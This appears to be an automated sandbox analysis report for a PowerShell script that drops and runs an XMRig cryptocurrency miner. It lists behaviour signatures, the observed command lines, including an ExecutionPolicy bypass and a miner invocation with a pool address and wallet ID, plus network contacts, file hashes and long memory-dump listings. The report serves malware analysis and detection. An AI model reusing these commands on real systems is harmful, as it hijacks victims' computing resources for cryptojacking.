| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3876-46-0x0000023863410000-0x0000023863430000-memory.dmp
memory/3876-47-0x0000023863460000-0x0000023863480000-memory.dmp
memory/3876-48-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-51-0x0000023863480000-0x00000238634A0000-memory.dmp
memory/3876-50-0x00000238634A0000-0x00000238634C0000-memory.dmp
memory/3032-49-0x00007FF886350000-0x00007FF886E12000-memory.dmp
memory/3032-53-0x00007FF886353000-0x00007FF886355000-memory.dmp
memory/3876-52-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-54-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-55-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-56-0x00000238634A0000-0x00000238634C0000-memory.dmp
memory/3876-57-0x0000023863480000-0x00000238634A0000-memory.dmp
memory/3876-58-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-59-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-60-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-61-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-62-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-63-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-64-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-65-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-66-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-67-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-68-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-69-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-70-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-71-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-72-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-73-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-74-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-75-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-76-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-77-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-78-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-79-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-80-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-81-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-82-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-83-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-84-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-85-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-86-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-87-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-88-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-89-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-90-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-91-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-92-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-93-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-94-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-95-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-96-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-97-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-98-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-99-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-100-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-101-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-102-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-103-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-104-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-105-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-106-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-107-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-108-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-109-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-110-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-111-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-112-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-113-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-114-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-115-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-116-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win10-20240404-en
Max time kernel
1794s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3268 wrote to memory of 3264 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3268 wrote to memory of 3264 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.197.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/3268-0-0x00007FFB323B3000-0x00007FFB323B4000-memory.dmp
memory/3268-5-0x00000235A77C0000-0x00000235A77E2000-memory.dmp
memory/3268-8-0x00000235A7980000-0x00000235A79F6000-memory.dmp
memory/3268-9-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jzgez2dw.ryx.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3268-18-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3268-25-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3268-48-0x00000235A7960000-0x00000235A7972000-memory.dmp
memory/3268-61-0x00000235A7940000-0x00000235A794A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3264-90-0x00000207E0DD0000-0x00000207E0DF0000-memory.dmp
memory/3268-91-0x00007FFB323B3000-0x00007FFB323B4000-memory.dmp
memory/3268-92-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3264-93-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3268-94-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3264-95-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3268-96-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3264-97-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-98-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-99-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-100-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-101-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-102-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-103-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-104-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-105-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-106-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-107-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-108-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-109-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-110-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-111-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-112-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-113-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-114-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-115-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-116-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-117-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-118-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-119-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-120-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-121-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-122-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-123-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-124-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-125-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-126-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-127-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-128-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-129-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-130-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-131-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-132-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-133-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-134-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-135-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-136-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-137-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-138-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-139-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-140-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-141-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-142-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-143-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-144-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-145-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-146-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-147-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-148-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-149-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-150-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-151-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-152-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-153-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-154-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-155-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-156-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-157-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:32
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4188 wrote to memory of 2344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4188 wrote to memory of 2344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/4188-2-0x00007FFF2E023000-0x00007FFF2E024000-memory.dmp
memory/4188-5-0x000001F5B36B0000-0x000001F5B36D2000-memory.dmp
memory/4188-6-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/4188-9-0x000001F5B3870000-0x000001F5B38E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgfye0nu.0zj.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4188-10-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/4188-25-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/4188-48-0x000001F5B3850000-0x000001F5B3862000-memory.dmp
memory/4188-61-0x000001F5B3840000-0x000001F5B384A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2344-90-0x00000234B0F00000-0x00000234B0F20000-memory.dmp
memory/2344-91-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/4188-93-0x00007FFF2E023000-0x00007FFF2E024000-memory.dmp
memory/2344-92-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/4188-94-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/4188-95-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/2344-96-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-97-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-98-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-99-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-100-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-101-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-102-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-103-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-104-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-105-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-106-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-107-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-108-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-109-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-110-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-111-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-112-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-113-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-114-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-115-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-116-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-117-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-118-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-119-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-120-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-121-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-122-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-123-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-124-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-125-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-126-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-127-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-128-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
